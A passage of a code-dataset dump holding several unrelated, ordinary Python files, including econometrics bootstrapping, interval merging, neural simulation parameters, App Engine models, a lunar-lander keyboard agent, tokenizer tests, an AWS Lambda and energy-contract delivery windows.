bootstrap variances of the observed sample moments.\"\"\"\n # Seed for reproducibility.\n np.random.seed(47828324)\n flat_empirical_moments = pd.Series(empirical_moments)\n index_base = data.index.get_level_values(\"subject\").unique()\n calc_moments = dict_to_list(calc_moments)\n # Create bootstrapped moments.\n moments_sample = list()\n for _ in range(n_bootstrap_samples):\n ids_boot = np.random.choice(\n index_base, n_observations_per_sample, replace=True\n )\n moments_boot = [func(data.loc[ids_boot]) for func in calc_moments]\n flat_moments_boot = pd.Series(moments_boot, index=flat_empirical_moments.index)\n moments_sample.append(flat_moments_boot)\n # Compute variance for each moment and construct diagonal weighting matrix.\n moments_var = np.array(moments_sample).var(axis=0)\n # The variance of missing moments is nan. Unless a repalcement variance is\n # specified, their inverse variance will be set to 0.\n if replace_missing_variances is None:\n diagonal = moments_var ** (-1)\n diagonal = np.nan_to_num(diagonal, nan=0)\n weighting_matrix = np.diag(diagonal)\n else:\n moments_var = np.nan_to_num(moments_var, nan=replace_missing_variances)\n diagonal = moments_var ** (-1)\n weighting_matrix = np.diag(diagonal)\n # Checks weighting matrix.\n if np.isnan(weighting_matrix).any() or np.isinf(weighting_matrix).any():\n raise ValueError(\"Weighting matrix contains NaNs or infinite values.\")\n return weighting_matrix\n","sub_path":"auxiliary/msm.py","file_name":"msm.py","file_ext":"py","file_size_in_byte":26155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"633947900","text":"# @Andreas Schwarzkopf (schwarzkopf.and@gmail.com)\r\n\r\n# standard library\r\n# using List to handle duplicates and order of the intervals and to define input/output of function\r\nfrom typing import List\r\n\r\n# example input [[25,30],[2,19],[14,23],4,8]]\r\n\r\n# Expected type for input and output are a List of Lists of Integers\r\n# Assumption: Since this module is only used for this coding task and not with pandas etc. integer will not cause memory overflow\r\ndef mergeIntervals(intervals: List[List[int]]) -> List[List[int]]:\r\n mergedIntervals = []\r\n\r\n # Assumption: raise TypeError if intervals is not List\r\n if not isinstance(intervals, List):\r\n raise TypeError\r\n\r\n # Assumption: return empty list if no interval is given\r\n if not intervals:\r\n return []\r\n\r\n # sort intervals by the first key source : https://stackoverflow.com/questions/21068315/python-sort-first-element-of-list\r\n intervals.sort(key=lambda x: x[0])\r\n\r\n for interval in intervals:\r\n # add interval to mergedIntervals if interval does not overlap with previous \r\n # or mergedIntervals is empty e.g. for the first interval\r\n if not mergedIntervals or mergedIntervals[-1][1] < interval[0]:\r\n mergedIntervals.append(interval)\r\n else:\r\n # in the other case there is overlap so merge previous interval with current one\r\n # https://www.programiz.com/python-programming/methods/built-in/max\r\n mergedIntervals[-1][1] = max(mergedIntervals[-1][1], interval[1])\r\n\r\n return mergedIntervals","sub_path":"merge/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"378731895","text":"parameter_simulation={\n 'path_result':'./simulation_default',\n 'seed':10, # the seed for the random generator\n 'save_time': 10000.0, # the time of simulation in each file\n}\n\nparameter_model ={\n #order of the model\n 'order':2,\n #parameter of the model\n 'g_L':10.0,\n 'E_L_e':-67.0,\n 'E_L_i':-65.0,\n 'C_m':200.0,\n 'b_e':10.0,\n 'a_e':0.0,\n 'b_i':0.0,\n 'a_i':0.0,\n 'tau_w_e':500.0,\n 'tau_w_i':1.0,\n 'E_e':0.0,\n 'E_i':-80.0,\n 'Q_e':1.0,\n 'Q_i':6.5,\n 'tau_e':5.0,\n 'tau_i':5.0,\n 'N_tot':10000,\n 'p_connect_e':0.10,\n 'p_connect_i':0.095,# True value : 0.05,\n 'g':0.2,\n 'T':20.0,\n 'P_e':[-0.05514735, 0.00444736, 0.00079013, 0.01183319, 0.00145571, 0.00155584, -0.00679113, 0.00091574, -0.00475571, 0.00332159],\n 'P_i':[-0.05637474, 0.005188, -0.00342982, 0.01282597, -0.00142761, -0.00201966, -0.02266407, 0.00330289, 0.00486843, -0.00908176],\n 'external_input_ex_ex':0.000,\n 'external_input_ex_in':0.000,\n 'external_input_in_ex':0.000,\n 'external_input_in_in':0.000,\n 'K_ext_e':400,\n 'K_ext_i':0,\n #Initial condition :\n 'initial_condition':{\n \"E\": [0.001, 0.0001],\"I\": [0.001, 0.0001],\"C_ee\": [0.0,0.0],\"C_ei\": [0.0,0.0],\"C_ii\": [0.0,0.0],\"W_e\": [0.0, 0.0],\"W_i\": [0.0,0.0]}\n}\n\nparameter_connection_between_region={\n ## CONNECTIVITY\n # connectivity by default\n 'default':False,\n #from file (repertory with following files : tract_lengths.npy and weights.npy)\n 'from_file':False,\n 'from_h5':True,\n 'path':'/home/kusch/Documents/project/Zerlaut/YAdEX_TVB/data/hcp-001.zip', #repertory of the files\n # File description\n 'number_of_regions':0, # number of region\n # lenghts of tract between region : dimension => (number_of_regions, number_of_regions)\n 'tract_lengths':[],\n # weight along the tract : dimension => (number_of_regions, number_of_regions)\n 'weights':[],\n # speed of along long range connection\n 'speed':4.0,\n 'normalised':True\n}\n\nparameter_coupling={\n ##COUPLING\n 'type':'Linear', # choice : Linear, Scaling, HyperbolicTangent, Sigmoidal, SigmoidalJansenRit, PreSigmoidal, Difference, Kuramoto\n 'parameter':{'a':5.0e-1,\n 'b':0.0}\n}\n\n# parameter_integrator={\n# ## INTEGRATOR\n# 'type':'RungeKutta4thOrderDeterministic', # choice : Heun, Euler\n# 'dt': 0.5\n# }\n\nparameter_integrator={\n ## INTEGRATOR\n 'type':'Heun', # choice : Heun, Euler\n 'stochastic':True,\n 'noise_type': 'Ornstein_Ulhenbeck_process', # choice : Additive,Multiplicative,\n 'noise_parameter':{\n 'mu':[1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], # in KHz, TAedit: decreased value from 1.0e-10\n 'nsig':[0.1, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], # in KHz, TAedit: decreased value from 1.0e-10\n 'tau_OU':0.1,\n 'ntau':0.0,\n 'weight':[1.e-2]\n },\n 'dt': 0.5 # in ms\n}\n\nparameter_monitor= {\n 'Raw':True,\n 'TemporalAverage':True,\n 'parameter_TemporalAverage':{\n 'variables_of_interest':[0,1,2,3,4,5,6],\n 'period':parameter_integrator['dt']*10.0\n },\n 'Bold':False,\n 'parameter_Bold':{\n 'variables_of_interest':[0],\n 'period':parameter_integrator['dt']*2000.0\n }\n # More monitor can be added\n}","sub_path":"tvb_model/parameter_new/parameter_New_1.py","file_name":"parameter_New_1.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"442047591","text":"from google.appengine.ext import ndb\nfrom urlparse import urlparse\n\nclass Url(ndb.Model):\n url = ndb.StringProperty()\n title = ndb.StringProperty()\n \n # Valid url: >=1\n valid = ndb.IntegerProperty(default=1)\n status = ndb.StringProperty()\n last_check = ndb.DateTimeProperty(auto_now_add=True)\n\n # FullTextSearch related stuff\n document_date = ndb.DateTimeProperty()\n \n # System stuff\n idate = ndb.DateTimeProperty(auto_now_add=True)\n udate = ndb.DateTimeProperty(auto_now=True)\n \n def parse(self):\n return urlparse(self.url)\n \n def loc_title(self):\n loc=urlparse(self.url).scheme+'//'+urlparse(self.url).netloc\n if self.title:\n return loc+' - '+self.title\n else:\n new_title=''.join(self.url.split('/')[-1:])\n if len(new_title)>40:\n return loc+' - '+new_title[:20]+'...'+new_title[len(new_title)-10:]\n else:\n return loc+' - '+new_title\n \n def short(self):\n if self.title:\n return self.title\n else:\n new_title=''.join(self.url.split('/')[-1:])\n if len(new_title)>40:\n return new_title[:20]+'...'+new_title[len(new_title)-10:]\n else:\n return new_title\n \n \n def __unicode__(self):\n if self.title:\n return self.title\n else:\n return ''.join(self.url.split('/')[-1:])\n \n def __str__(self):\n return unicode(self).encode('utf-8')\n\nclass Channel(ndb.Model):\n name = ndb.StringProperty()\n private = ndb.BooleanProperty(default=False)\n\n # System stuff\n idate = ndb.DateTimeProperty(auto_now_add=True)\n udate = ndb.DateTimeProperty(auto_now=True)\n \n def __unicode__(self):\n return self.name\n\n def __str__(self):\n return unicode(self).encode('utf-8')\n\nclass ChannelUrl(ndb.Model):\n # Reference to Channel & Url\n channel = ndb.KeyProperty(kind=Channel)\n url = ndb.KeyProperty(kind=Url)\n\n # System stuff\n idate = ndb.DateTimeProperty(auto_now_add=True)\n udate = ndb.DateTimeProperty(auto_now=True)\n\n def rating(self):\n value=0\n rates=Rate.query(Rate.channelurl==self.key)\n for rate in rates:\n value=value+rate.value\n return value\n\n def extras(self,plain=False):\n xtra=''\n extras=Extra.query(Extra.channelurl==self.key)\n for extra in extras:\n if extra.comment:\n xtra=xtra+' '+extra.comment\n if extra.tag:\n if plain:\n xtra=xtra+extra.tag\n elif extra.tag=='WTF':\n xtra=xtra+' <span class=\"label label-danger\">'+extra.tag+'</span>'\n elif extra.tag=='NSFW':\n xtra=xtra+' <span class=\"label label-warning\">'+extra.tag+'</span>'\n else:\n xtra=xtra+' <span class=\"label label-primary\">'+extra.tag+'</span>'\n if extra.related:\n if plain:\n xtra=xtra+extra.related\n else:\n xtra=xtra+' <span class=\"label label-info\">'+extra.related+'</span>'\n return xtra.strip()\n\n def posts(self):\n chl=self.channel.get()\n msg=''\n msgs=[]\n posts=Post.query(Post.channelurl==self.key)\n for post in posts:\n msgs.append('%s/%s @ %s' % (post.user,chl.name,post.date))\n return ', '.join(msgs)\n \n def __unicode__(self):\n return unicode(self.key.id())\n\n def __str__(self):\n return unicode(self).encode('utf-8')\n \nclass Post(ndb.Model):\n user = ndb.StringProperty()\n date = ndb.DateTimeProperty()\n\n # Reference to ChannelUrl\n channelurl = ndb.KeyProperty(kind=ChannelUrl)\n\n # System stuff\n idate = ndb.DateTimeProperty(auto_now_add=True)\n udate = ndb.DateTimeProperty(auto_now=True)\n \n def __unicode__(self):\n return unicode(self.key.id())\n\n def __str__(self):\n return unicode(self).encode('utf-8')\n\nclass Rate(ndb.Model):\n user = ndb.StringProperty()\n value = ndb.IntegerProperty()\n\n # Reference to ChannelUrl\n channelurl = ndb.KeyProperty(kind=ChannelUrl)\n\n # System stuff\n idate = ndb.DateTimeProperty(auto_now_add=True)\n udate = ndb.DateTimeProperty(auto_now=True)\n\n def __unicode__(self):\n return '%s %+d' % (self.user, self.value)\n\n def __str__(self):\n return unicode(self).encode('utf-8')\n\nclass Extra(ndb.Model):\n user = ndb.StringProperty()\n related = ndb.StringProperty() \n tag = ndb.StringProperty() \n comment = ndb.StringProperty() \n\n # Reference to Post\n channelurl = ndb.KeyProperty(kind=ChannelUrl)\n\n # System stuff\n idate = ndb.DateTimeProperty(auto_now_add=True)\n udate = ndb.DateTimeProperty(auto_now=True)\n\n def __unicode__(self):\n retval=''\n if self.comment:\n retval+=' '+self.comment\n if self.tag:\n retval+=' <a href=\"/url/tag/'+self.tag+'/\"><span class=\"label '\n if self.tag=='WTF':\n retval+='label-danger'\n elif self.tag=='NSFW':\n retval+='label-warning'\n else:\n retval+='label-primary'\n retval+='\">'+self.tag+'</span></a>'\n if self.related:\n retval+=' <a href=\"/url/view/'+self.related+'/\"><span class=\"label label-info\">'+self.related+'</span></a>'\n return retval.strip()\n\n def __str__(self):\n return unicode(self).encode('utf-8')\n \n","sub_path":"url_models.py","file_name":"url_models.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"393182658","text":"#!/usr/bin/env python\nimport sys, gym, time\nfrom lunar_lander_bot import LunarLander\nimport pickle\nimport numpy as np\n\nenv = LunarLander()\n\nif not hasattr(env.action_space, 'n'):\n raise Exception('Keyboard agent only supports discrete action spaces')\nACTIONS = env.action_space.n\nSKIP_CONTROL = 0 # Use previous control decision SKIP_CONTROL times, that's how you\n # can test what skip is still usable.\n\nhuman_agent_action = 0\nhuman_wants_restart = False\nhuman_sets_pause = False\n\ndef key_press(key, mod):\n global human_agent_action, human_wants_restart, human_sets_pause\n if key==0xff0d: human_wants_restart = True\n if key==32: human_sets_pause = not human_sets_pause\n a = int( key - ord('0') )\n if a <= 0 or a >= ACTIONS: return\n human_agent_action = a\n\ndef key_release(key, mod):\n global human_agent_action\n a = int( key - ord('0') )\n if a <= 0 or a >= ACTIONS: return\n if human_agent_action == a:\n human_agent_action = 0\n\nenv.render()\nenv.unwrapped.viewer.window.on_key_press = key_press\nenv.unwrapped.viewer.window.on_key_release = key_release\n\ndef rollout(env):\n global human_agent_action, human_wants_restart, human_sets_pause\n human_wants_restart = False\n obser = env.reset()\n skip = 0\n total_reward = 0\n total_timesteps = 0\n while 1:\n if not skip:\n #print(\"taking action {}\".format(human_agent_action))\n a = human_agent_action\n total_timesteps += 1\n skip = SKIP_CONTROL\n else:\n skip -= 1\n obser, r, done, info = env.step(a)\n if r != 0:\n print(\"reward %0.3f\" % r)\n total_reward += r\n window_still_open = env.render()\n if window_still_open==False: return False\n if done: break\n if human_wants_restart: break\n # Its important to use binary mode\n dbfile = open('probs.p', 'rb')\n # source, destination\n proba = pickle.load(dbfile)\n values = proba*100\n print(np.floor(values))\n while human_sets_pause:\n env.render()\n time.sleep(0.1)\n time.sleep(0.1)\n print(\"timesteps %i reward %0.2f\" % (total_timesteps, total_reward))\n\nwhile 1:\n window_still_open = rollout(env)\n if window_still_open==False: break\n","sub_path":"keyboard_agent.py","file_name":"keyboard_agent.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"49020392","text":"from django.test.client import Client\nfrom django.test import TestCase, tag\nfrom django.urls import resolve\n\nfrom aidants_connect_web.views import usagers\nfrom aidants_connect_web.tests.factories import UserFactory, UsagerFactory\n\n\n@tag(\"usagers\")\nclass UsagersIndexPageTests(TestCase):\n def setUp(self):\n self.client = Client()\n self.aidant = UserFactory()\n\n def test_usagers_index_url_triggers_the_usagers_index_view(self):\n found = resolve(\"/usagers/\")\n self.assertEqual(found.func, usagers.usagers_index)\n\n def test_usagers_index_url_triggers_the_usagers_index_template(self):\n self.client.force_login(self.aidant)\n response = self.client.get(\"/usagers/\")\n self.assertTemplateUsed(response, \"aidants_connect_web/usagers.html\")\n\n\n@tag(\"usagers\")\nclass UsagersDetailsPageTests(TestCase):\n def setUp(self):\n self.client = Client()\n self.aidant = UserFactory()\n self.usager = UsagerFactory()\n\n def test_usagers_details_url_triggers_the_usagers_details_view(self):\n found = resolve(\"/usagers/1/\")\n self.assertEqual(found.func, usagers.usagers_details)\n","sub_path":"aidants_connect_web/tests/test_views/test_usagers.py","file_name":"test_usagers.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"644982763","text":"r\"\"\"Test `lmp.tokenizer.CharDictTokenizer.decode`.\n\nUsage:\n python -m unittest test.lmp.tokenizer._char_dict_tokenizer.test_decode\n\"\"\"\n\n# built-in modules\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport gc\nimport inspect\nimport math\nimport unittest\n\nfrom typing import Iterable\n\n# self-made modules\n\nfrom lmp.tokenizer import CharDictTokenizer\n\n\nclass TestDecode(unittest.TestCase):\n r\"\"\"Test case for `lmp.tokenizer.CharDictTokenizer.decode`.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.vocab_source = [\n 'Hello World!',\n 'I am a legend.',\n ]\n\n @classmethod\n def tearDownClass(cls):\n del cls.vocab_source\n gc.collect()\n\n def setUp(self):\n r\"\"\"Setup both cased and uncased tokenizer instances.\"\"\"\n self.cased_tokenizer = CharDictTokenizer()\n self.cased_tokenizer.build_vocab(self.__class__.vocab_source)\n self.uncased_tokenizer = CharDictTokenizer(is_uncased=True)\n self.uncased_tokenizer.build_vocab(self.__class__.vocab_source)\n self.tokenizers = [self.cased_tokenizer, self.uncased_tokenizer]\n\n def tearDown(self):\n r\"\"\"Delete both cased and uncased tokenizer instances.\"\"\"\n del self.tokenizers\n del self.cased_tokenizer\n del self.uncased_tokenizer\n gc.collect()\n\n def test_signature(self):\n r\"\"\"Ensure signature consistency.\"\"\"\n msg = 'Inconsistent method signature.'\n\n self.assertEqual(\n inspect.signature(CharDictTokenizer.decode),\n inspect.Signature(\n parameters=[\n inspect.Parameter(\n name='self',\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n ),\n inspect.Parameter(\n name='token_ids',\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n annotation=Iterable[int],\n default=inspect.Parameter.empty\n ),\n inspect.Parameter(\n name='remove_special_tokens',\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n annotation=bool,\n default=False\n )\n ],\n return_annotation=str\n ),\n msg=msg\n )\n\n def test_invalid_input_token_ids(self):\n r\"\"\"Raise `TypeError` when input `token_ids` is invalid.\"\"\"\n msg1 = 'Must raise `TypeError` when input `token_ids` is invalid.'\n msg2 = 'Inconsistent error message.'\n examples = (\n False, True, 0, 1, -1, 0.0, 1.0, math.nan, -math.nan, math.inf,\n -math.inf, 0j, 1j, object(), lambda x: x, type, None,\n NotImplemented, ..., [0.0], [1.0], [math.nan], [-math.nan],\n [math.inf], [-math.inf], [0j], [1j], [''], [b''], [()], [[]], [{}],\n [set()], [object()], [lambda x: x], [type], [None],\n [NotImplemented], [...], [0, 0.0], [0, 1.0], [0, math.nan],\n [0, -math.nan], [0, math.inf], [0, -math.inf], [0, 0j], [0, 1j],\n [0, ''], [0, b''], [0, ()], [0, []], [0, {}], [0, set()],\n [0, object()], [0, lambda x: x], [0, type], [0, None],\n [0, NotImplemented], [0, ...],\n )\n\n for invalid_input in examples:\n for tokenizer in self.tokenizers:\n with self.assertRaises(TypeError, msg=msg1) as cxt_man:\n tokenizer.decode(token_ids=invalid_input)\n\n self.assertEqual(\n cxt_man.exception.args[0],\n '`token_ids` must be an instance of `Iterable[int]`.',\n msg=msg2\n )\n\n def test_invalid_input_remove_special_tokens(self):\n r\"\"\"Raise `TypeError` when input `remove_special_tokens` is invalid.\"\"\"\n msg1 = (\n 'Must raise `TypeError` when input `remove_special_tokens` is '\n 'invalid.'\n )\n msg2 = 'Inconsistent error message.'\n examples = (\n 0, 1, -1, 0.0, 1.0, math.nan, -math.nan, math.inf, -math.inf, 0j, 1j,\n '', b'', (), [], {}, set(), object(), lambda x: x, type, None,\n NotImplemented, ...,\n )\n\n for invalid_input in examples:\n for tokenizer in self.tokenizers:\n with self.assertRaises(TypeError, msg=msg1) as cxt_man:\n tokenizer.decode(\n token_ids=[],\n remove_special_tokens=invalid_input\n )\n\n self.assertEqual(\n cxt_man.exception.args[0],\n '`remove_special_tokens` must be an instance of `bool`.',\n msg=msg2\n )\n\n def test_return_type(self):\n r\"\"\"Return `str`.\"\"\"\n msg = 'Must return `str`.'\n examples = (\n [0, 1, 2, 3],\n [4, 5, 6, 7, 8, 9],\n [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],\n [0],\n [],\n )\n\n for token_ids in examples:\n for tokenizer in self.tokenizers:\n self.assertIsInstance(\n tokenizer.decode(token_ids=token_ids),\n str,\n msg=msg\n )\n\n def test_remove_special_tokens(self):\n r\"\"\"Remove special tokens.\"\"\"\n msg = 'Must remove special tokens.'\n examples = (\n (\n False,\n [0, 10, 6, 4, 4, 7, 5, 11, 7, 12, 4, 8, 13, 1, 2],\n '[bos]Hello World![eos][pad]',\n '[bos]hello world![eos][pad]',\n ),\n (\n False,\n [0, 14, 5, 9, 15, 5, 9, 5, 3, 1, 2, 2],\n '[bos]I am a [unk][eos][pad][pad]',\n '[bos]i am a [unk][eos][pad][pad]',\n ),\n (\n False,\n [0, 19, 4, 6, 16, 6, 17, 8, 18, 1],\n '[bos][unk]legend.[eos]',\n '[bos][unk]legend.[eos]',\n ),\n (\n True,\n [0, 10, 6, 4, 4, 7, 5, 11, 7, 12, 4, 8, 13, 1, 2],\n 'Hello World!',\n 'hello world!',\n ),\n (\n True,\n [0, 14, 5, 9, 15, 5, 9, 5, 3, 1, 2, 2],\n 'I am a [unk]',\n 'i am a [unk]',\n ),\n (\n True,\n [0, 19, 4, 6, 16, 6, 17, 8, 18, 1],\n '[unk]legend.',\n '[unk]legend.',\n ),\n )\n\n for (\n remove_special_tokens,\n token_ids,\n cased_sequence,\n uncased_sequence\n ) in examples:\n self.assertEqual(\n self.cased_tokenizer.decode(\n token_ids=token_ids,\n remove_special_tokens=remove_special_tokens\n ),\n cased_sequence,\n msg=msg\n )\n self.assertEqual(\n self.uncased_tokenizer.decode(\n token_ids=token_ids,\n remove_special_tokens=remove_special_tokens\n ),\n uncased_sequence,\n msg=msg\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/lmp/tokenizer/_char_dict_tokenizer/test_decode.py","file_name":"test_decode.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"32047782","text":"import boto3\nimport json\nimport os\n\ndef handler(event, context):\n\n print('Initiating image rekognition')\n\n for record in event['Records']:\n bucket = record['s3']['bucket']['name']\n key = record['s3']['object']['key']\n\n print('Detected the following image in S3')\n print('Bucket: ' + bucket + ' key name: ' + key)\n \n ourObject = {\n \"ourBucket\": bucket,\n \"ourKey\": key\n }\n\n # Replace Step Function ARN\n\n stepARN = os.environ['STEP_ARN']\n\n client = boto3.client('stepfunctions')\n\n print(json.dumps(ourObject))\n\n response = client.start_execution(\n stateMachineArn=stepARN,\n input = json.dumps(ourObject)\n )\n\n return","sub_path":"cdk-findhuman/s3lambda/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"418974226","text":"\n\nimport pandas as pd\nimport re\n#\nfrom .. import global_var\nfrom . import compute_delivery_dates\n\n\ndef compute_delivery_windows(frequency = None,\n delivery_begin_year_local = None,\n delivery_period_index = None,\n profile = None,\n delivery_begin_date_local = None,\n delivery_end_date_local = None,\n tz_local = None,\n ):\n \"\"\"\n Computes the delivery windows of a given contract.\n \n :param frequency: The type of delivery contract (year, month, etc.)\n :param delivery_begin_year_local: The year of the delivery\n :param delivery_period_index: The index of the delivery contract\n :param profile: The profile of the delivery\n :param delivery_begin_date_local: The beginning date of the delivery\n :param delivery_end_date_local: The beginning date of the delivery\n :param tz_local: The local timezone\n :type frequency: string\n :type delivery_begin_year_local: int\n :type delivery_period_index: int\n :type profile: string\n :type delivery_begin_date_local: pd.Timestamp\n :type delivery_end_date_local: pd.Timestamp\n :type tz_local: pytz.tzfile\n :return: The delivery windows as list of intervals\n :rtype: list of pairs of pd.Timestamp\n \"\"\"\n\n bloc_match = re.compile(global_var.contract_profile_bloc_pattern).match(profile)\n if ( frequency == global_var.contract_frequency_unknown\n or not ( bloc_match\n or profile in [global_var.contract_profile_gas,\n global_var.contract_profile_base,\n global_var.contract_profile_peak,\n global_var.contract_profile_ofpk,\n global_var.contract_profile_hour,\n global_var.contract_profile_half_hour,\n global_var.contract_profile_wday2024,\n global_var.contract_profile_wday1620,\n global_var.contract_profile_wend2024,\n ]\n )\n ):\n return None\n \n if not delivery_begin_date_local:\n delivery_begin_date_local, delivery_end_date_local = compute_delivery_dates(delivery_begin_year = delivery_begin_year_local,\n frequency = frequency,\n delivery_period_index = delivery_period_index,\n local_tz = tz_local,\n )\n else:\n dd, delivery_end_date_local = compute_delivery_dates(delivery_begin_year=delivery_begin_year_local,\n delivery_begin_date=delivery_begin_date_local,\n delivery_end_date=delivery_end_date_local,\n frequency=frequency,\n delivery_period_index=delivery_period_index,\n local_tz=tz_local,\n )\n if dd != delivery_begin_date_local:\n assert profile == global_var.contract_profile_peak, 'Incorrect begin_date, profile : {0}, {1}'.format(delivery_begin_date_local,\n profile,\n frequency,\n )\n \n if profile == global_var.contract_profile_gas:\n return [(delivery_begin_date_local.replace(hour = 6),\n delivery_end_date_local.replace(hour = 6),\n )]\n \n elif profile == global_var.contract_profile_base:\n return [(delivery_begin_date_local,\n delivery_end_date_local,\n )]\n\n elif profile == global_var.contract_profile_peak:\n return [(delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = 8),\n delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = 20),\n )\n for ii_day in range(( delivery_end_date_local.tz_localize(None)\n - delivery_begin_date_local.tz_localize(None)\n ).days)\n if ( (delivery_begin_date_local + pd.DateOffset(days = ii_day)).weekday() not in [5, 6]\n or (delivery_end_date_local - delivery_begin_date_local).days <= 2 # Il semble que les contrats week peak n'incluent pas les we mais les produits we peak existent\n )\n ]\n\n elif profile == global_var.contract_profile_ofpk:\n return [(delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = begin_hour),\n delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = end_hour),\n )\n for ii_day in range(( delivery_end_date_local.tz_localize(None)\n - delivery_begin_date_local.tz_localize(None)\n ).days)\n for begin_hour, end_hour in ([(0,8), (20,24)]\n if\n (delivery_begin_date_local + pd.DateOffset(days = ii_day)).weekday() not in [5,6]\n else\n [(0,24)]\n )\n ]\n\n elif profile == global_var.contract_profile_hour:\n hour_match = re.compile(global_var.contract_delivery_period_index_hour_pattern).match(str(delivery_period_index))\n hour = int(hour_match.group(3))\n return [(delivery_begin_date_local + pd.DateOffset(hours = hour),\n delivery_begin_date_local + pd.DateOffset(hours = hour + 1),\n )]\n\n elif profile == global_var.contract_profile_half_hour:\n half_hour_match = re.compile(global_var.contract_delivery_period_index_half_hour_pattern).match(str(delivery_period_index))\n hour = int(half_hour_match.group(3))\n minute = int(half_hour_match.group(4))\n return [(delivery_begin_date_local + pd.DateOffset(hours = hour, minutes = minute),\n delivery_begin_date_local + pd.DateOffset(hours = hour, minutes = minute + 30),\n )]\n\n elif bool(bloc_match):\n hour_begin = int(bloc_match.group(1))\n hour_end = int(bloc_match.group(2))\n return [(delivery_begin_date_local + pd.DateOffset(hours = hour_begin),\n delivery_begin_date_local + pd.DateOffset(hours = hour_end, days = int(hour_end < hour_begin)),\n )]\n \n elif profile == global_var.contract_profile_wday2024:\n begin_hour = 20\n end_hour = 24\n return [(delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = begin_hour),\n delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = end_hour),\n )\n for ii_day in range(5)\n ]\n\n elif profile == global_var.contract_profile_wday1620:\n begin_hour = 16\n end_hour = 20\n return [(delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = begin_hour),\n delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = end_hour),\n )\n for ii_day in range(5)\n ]\n \n elif profile == global_var.contract_profile_wend2024:\n begin_hour = 20\n end_hour = 24\n return [(delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = begin_hour),\n delivery_begin_date_local + pd.DateOffset(days = ii_day) + pd.DateOffset(hours = end_hour),\n )\n for ii_day in range(2)\n ]\n \n\n else:\n raise NotImplementedError('Incorrect profile : {0}'.format(profile))","sub_path":"pub_data_visualization/global_tools/compute_delivery_windows.py","file_name":"compute_delivery_windows.py","file_ext":"py","file_size_in_byte":8862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"64221009","text":"import os\nimport sys\nimport time\nfrom flask import Flask\nfrom linebot import LineBotApi, WebhookParser\nfrom dotenv import load_dotenv\n\nfrom views import register_url\n\napp = Flask(__name__)\n\n# Load env variables\ndotenv_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), '.env')\nif os.path.exists(dotenv_path):\n load_dotenv(dotenv_path=dotenv_path)\n\n# Set up config\napp.config.update({\n \"DEBUG\": True if os.getenv(\"DEBUG\") == \"True\" else False,\n \"DATABASE_URI\": os.getenv(\"DATABASE_URI\"),\n \"CHANNEL_ACCESS_TOKEN\": os.getenv(\"CHANNEL_ACCESS_TOKEN\", None),\n \"CHANNEL_SECRET\": os.getenv(\"CHANNEL_SECRET\", None),\n})\n\n# Create Linebot instance\ntry:\n app.linebot = LineBotApi(app.config['CHANNEL_ACCESS_TOKEN'])\n app.parser = WebhookParser(app.config['CHANNEL_SECRET'])\nexcept KeyError:\n app.logger.error(\"Please specify line CHANNEL_ACCESS_TOKEN and CHANNEL_SECRET.\")\n sys.exit(1)\n\n# Register routing rule\nregister_url(app)\n\ntime.sleep(5) # wait for postgresql to start\n\n# Base models will be created in routine container\napp.logger.info(\"START....\")\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"547367317","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom .. import arg, Unit, RefineryPartialResult\nfrom ...lib.types import INF\n\nfrom .ap import aplib\nfrom .bz2 import bz2\nfrom .lz import lzma\nfrom .lznt1 import lznt1\nfrom .zl import zl\nfrom .lz4 import lz4\nfrom .blz import blz\n\n\nclass decompress(Unit):\n \"\"\"\n Attempts all available decompression units against the input and returns\n the output of the first successful one. If none succeeds, the data is\n returned unaltered. The process is heavily biased against LZNT1 decompression\n due to a large tendency for LZNT1 false positives.\n \"\"\"\n def __init__(\n self,\n prepend: arg.switch('-P', '--no-prepend', off=True, help=(\n 'By default, if decompression fails, the unit attempts to prefix '\n 'the data with all possible values of a single byte and decompress '\n 'the result. This behavior can be disabled with this flag.')\n ) = True,\n tolerance: 